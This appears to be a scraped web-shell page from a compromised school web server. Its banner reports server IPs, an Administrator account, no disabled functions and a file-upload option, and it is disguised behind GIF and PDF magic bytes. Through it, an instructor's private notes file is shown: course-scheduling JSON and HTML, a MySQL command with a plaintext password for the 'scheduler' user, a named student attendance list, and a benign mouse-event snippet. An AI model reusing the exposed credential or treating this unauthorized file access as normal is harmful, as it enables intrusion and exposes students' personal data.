GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST2146/Notes/Archive/ |
Upload File : |
Notes: Continue working on: The task [Move meetings] Should meetings with multiple days actually be multiple meetings? alter user 'scheduler'@'%' identified with mysql_native_password by 'Scheduler2146'; ClassMeeting[22]=[ 0 {"scmId":"1002","sDate":"2017-01-09","eDate":"2017-05-12","bTime":"09:00:00","eTime":"10:40:00","onCampus":"1","rooms":["327"],"days":["T","W"],"instructors":["17"],"tdMinute":540}, 1 {"scmId":"1003","sDate":"2017-01-09","eDate":"2017-05-12","bTime":"11:45:00","eTime":"13:25:00","onCampus":"1","rooms":[],"days":["H"],"instructors":["21"],"tdMinute":690}, 2 {"scmId":"1004","sDate":"2017-01-09","eDate":"2017-05-12","bTime":"12:00:00","eTime":"13:40:00","onCampus":"1","rooms":["B62"],"days":["F"],"instructors":["20"],"tdMinute":720} ] <label for="chk_moveMeeting_T"> <input type="checkbox" class="movemeetingcheckbox" name="moveMeeting_3" id="chk_moveMeeting_T" onclick="MoveClass_DialogClick(this);" value="T" checked=""> Move <span class="weekday">T</span> 9:00am - 10:40am to <span class="weekday">T</span> 8:00am - 9:40am </label> <label for="chk_moveMeeting_W"> <input type="checkbox" class="movemeetingcheckbox" name="moveMeeting_4" id="chk_moveMeeting_W" onclick="MoveClass_DialogClick(this);" value="W" checked=""> Move <span class="weekday">W</span> 9:00am - 10:40am to <span class="weekday">W</span> 8:00am - 9:40am </label> <div id="calendar_class_22_T540" class="calendar_class Hutchinson" onmouseover="ttLoad(this,'',ScheduleInstructions,true);" onmouseout="ttHide();" style="left: 477px; width: 256px; display: block; top: 200px; height: 133.333px;"><div class="relative" style="height: 133.333px;">CST1025 <span class="nowrap">- 41,42</span> <span class="nowrap">2cr</span><br><span id="days_1002_1">TW</span> <span id="bTime_1002_1">9:00am</span>-<span id="eTime_1002_1">10:40am</span><br>rm 327.<br>Joyce Leske<br>1/9/2017-5/12/2017<br>scId:22 scmId:1002 <br> QId: courseId:2381 <br>Network Basics<div id="campus_22_T_Hutchinson" class="campus Hutchinson"></div></div></div> 2020-04-03 10 points. Attended Friday work session. Attended: Abdifatah Mohamed Austin Lease Branden Buermann Christopher Seiffert Cody Raduenz Darrien McAllister Drew Kallhoff Kathryn Nelson Leah Schmid Natasha Iverson Terence Jackson Students: Abdifatah Mohamed Alexander Gould Austin Lease Branden Buermann Christopher Seiffert Cody Raduenz Damien Carlson Darrien McAllister Drew Kallhoff Jameashia Nwankwo Kathryn Nelson Leah Schmid Natasha Iverson Terence Jackson Zachary Nordmeyer detect mouse move vs click: const element = document.createElement('div') element.innerHTML = 'test' document.body.appendChild(element) let moved let downListener = () => { moved = false } element.addEventListener('mousedown', downListener) let moveListener = () => { moved = true } element.addEventListener('mousemove', moveListener) let upListener = () => { if (moved) { console.log('moved') } else { console.log('not moved') } } element.addEventListener('mouseup', upListener) // release memory element.removeEventListener('mousedown', downListener) element.removeEventListener('mousemove', moveListener) element.removeEventListener('mouseup', upListener)